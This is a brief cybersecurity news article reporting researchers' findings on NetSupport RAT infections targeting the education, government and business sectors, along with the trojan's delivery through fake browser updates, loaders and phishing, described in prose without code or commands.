NetSupport RAT Deployed Against Multiple Targets
Education, government, and business services sectors are currently under threat from malicious actors employing a remote access trojan named NetSupport RAT. According to a report from VMware Carbon Black researchers shared with The Hacker News, the delivery methods for this trojan include deceptive updates, drive-by downloads, the use of malware loaders like GHOSTPULSE, and various phishing campaigns.
NetSupport RAT Scores Over a Dozen Hits
In the past few weeks, the cybersecurity firm has identified at least 15 new infections associated with NetSupport RAT. Originally designed as a legitimate remote administration tool, NetSupport Manager has been exploited by malicious entities, turning it into a gateway for subsequent attacks. The trojan is commonly infiltrated into a victim's computer through deceptive websites and counterfeit browser updates.
Sucuri highlighted an August 2022 campaign involving compromised WordPress sites that displayed fake Cloudflare DDoS protection pages, ultimately leading to the distribution of NetSupport RAT.
The strategy of employing fraudulent web browser updates aligns with the tactics associated with SocGholish, a JavaScript-based downloader malware. This malware has been observed spreading a loader malware named BLISTER.
The JavaScript payload triggers PowerShell to establish a connection with a remote server, retrieving a ZIP archive file containing NetSupport RAT. Once installed, the trojan communicates with a command-and-control (C2) server. With NetSupport RAT on a victim's device, malicious actors gain the ability to monitor activities, transfer files, alter computer configurations, and propagate to other devices within the network, according to the researchers.